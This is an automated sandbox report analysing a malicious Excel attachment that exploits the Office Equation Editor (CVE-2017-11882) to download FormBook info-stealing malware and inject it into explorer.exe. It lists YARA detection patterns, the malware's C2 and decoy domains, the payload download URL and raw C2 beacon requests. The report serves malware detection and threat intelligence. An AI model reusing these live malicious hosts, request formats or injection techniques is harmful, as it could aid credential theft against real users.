
Windows Analysis Report SWIFT - Copy - Copy.xlsx

Overview

General Information

Sample Name: SWIFT - Copy - Copy.xlsx
Analysis ID: 553293
MD5: 338cbe8a882d7c941afe2cf895055bd5
SHA1: f081a9d12054b2e1a59d3eae4fa65059db634268
SHA256: 097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
Tags: xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Pcportk28.exe (PID: 2124 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
      • Pcportk28.exe (PID: 1964 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2564 cmdline: /c del "C:\Users\Public\Pcportk28.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}

Yara Overview

Memory Dumps

Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

[31 entries in total; the remainder are collapsed in the report]

Unpacked PEs

Source: 5.2.Pcportk28.exe.400000.1.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.Pcportk28.exe.400000.1.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.2.Pcportk28.exe.400000.1.unpack
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dec:$sqlite3step: 68 34 1C 7B E1
  • 0x15d08:$sqlite3text: 68 38 2A 90 C5
  • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C

Source: 5.0.Pcportk28.exe.400000.9.raw.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.0.Pcportk28.exe.400000.9.raw.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

[25 entries in total; the remainder are collapsed in the report]

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 131.153.37.4, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 1760

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}
Yara detected FormBook
Source: Yara match, File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://mikeloayza.com/E9/i4L.exe, Avira URL Cloud: Label: malware
Source: https://mikeloayza.com/E9/i4L.exe, Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: SWIFT - Copy - Copy.xlsx, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Pcportk28.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe, Joe Sandbox ML: detected
Source: 5.2.Pcportk28.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.9.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\Pcportk28.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\Pcportk28.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown, HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
Source: global traffic, DNS query: name: mikeloayza.com
Source: C:\Users\Public\Pcportk28.exe, Code function: 4x nop then pop ebx
Source: C:\Users\Public\Pcportk28.exe, Code function: 4x nop then pop edi
Source: C:\Users\Public\Pcportk28.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wininit.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wininit.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wininit.exe, Code function: 4x nop then pop ebx
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80
Source: global traffic, TCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe, Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe, Network Connect: 162.0.209.73 80
Source: C:\Windows\explorer.exe, Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe, Network Connect: 118.67.131.217 80
Source: C:\Windows\explorer.exe, Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe, Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe, Network Connect: 216.239.34.21 80
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.healingandhealthy.com/i6ro/
Source: Joe Sandbox View, ASN Name: ACPCA ACPCA
Source: Joe Sandbox View, ASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
Source: Joe Sandbox View, ASN Name: SSASN2US SSASN2US
Source: Joe Sandbox View, JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.fisioletsgo.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.bitcointradel.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.executive-air.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
  Host: www.luckyfandom.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, IP Address: 118.67.131.217 118.67.131.217
Source: global traffic, HTTP traffic detected:
  GET /E9/i4L.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: mikeloayza.com
Source: global traffic, HTTP traffic detected:
  GET /E9/i4L.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: mikeloayza.com
  Connection: Keep-Alive
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown, Network traffic detected: HTTP traffic on port 49168 -> 443
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Fri, 14 Jan 2022 15:06:04 GMT
  Content-Type: text/html
  Content-Length: 275
  ETag: "618be761-113"
  Via: 1.1 google
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner
